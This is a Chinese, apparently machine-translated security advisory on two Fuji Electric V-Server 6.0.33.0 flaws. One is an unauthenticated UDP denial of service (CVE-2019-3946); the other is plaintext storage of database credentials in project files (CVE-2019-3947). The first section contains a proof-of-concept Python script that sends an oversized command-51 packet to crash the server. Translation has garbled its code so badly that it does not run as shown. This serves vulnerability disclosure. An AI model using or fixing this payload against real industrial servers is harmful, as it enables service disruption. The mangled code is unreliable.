富士电机株式会社V-Server拒绝服务和信息披露
媒介剧情简介
cve - 2019 - 3946:未经身份验证的远程拒绝服务
站得住脚的发现了一个拒绝服务漏洞在富士电气V-Server 6.0.33.0版本。拒绝服务的结果是一个整数溢出发生在处理的命令51消息发送到UDP端口8005。以下概念证明再现了这个问题:
进口sys、插座、ssl、argparse binascii从结构导入* def mk_msg (cmd,数据,seq = 1): mlen = 5 + len(数据)味精=包(> HHB, mlen seq, cmd) +数据;返回味精;解析器= argparse.ArgumentParser()解析器。add_argument (“target_host”,帮助=“V-Server主机”)解析器。add_argument (“target_port”,帮助= " V-Server端口(即。8005)”,类型= int)参数= parser.parse_args主机= args ()。target_host端口=参数。target_port s = socket.socket(套接字。AF_INET socket.SOCK_DGRAM) s.settimeout (5)。连接((主机、端口))= ' VSVR #魔法数据+ =包(' > H ', 0 x3e7) # sub-command数据+ = A * 0 x20 # DB数据源名称数据+ = B * 0 x20 # DB用户名数据+ = ' C ' * 0 x20 # DB用户信誉数据+ = ' D ' * 0 x80 #表名items_hdr = ' U ' * 0 xc items_hdr + =包(' > H ', 0 xffff) #项数items_hdr + = ' U ' * 0 xc数据+ = items_hdr #物品而len(数据)+ 6 > = 0 x1388 - 5:数据+ =包(x8001 >终极战士,0,0 xc 0 x8001)味精= mk_msg(51、数据);s.send(味精)res = s.recv(1024)打印binascii.hexlify (res)
cve - 2019 - 3947:明文密码存储
此外,DB凭证披露漏洞存在于V-Server项目文件。V-Server可以连接到一个SQL服务器。这允许一个数据库用于日志存储。通过V-Server DB凭证输入UI保存在项目文件。但似乎DB凭证存储在纯文本,这可能被未经授权的用户。下面是一个示例项目文件与可见数据库凭证。
风险信息
成立咨询ID
交易- 2019 - 27所示
CVSSv2基地/时间的分数
5.0/3.7
CVSSv2向量
AV: N /交流:L /非盟:N / C: N /我:N: P
受影响的产品
富士电机株式会社V-Server 6.0.33.0之前
风险因素
媒介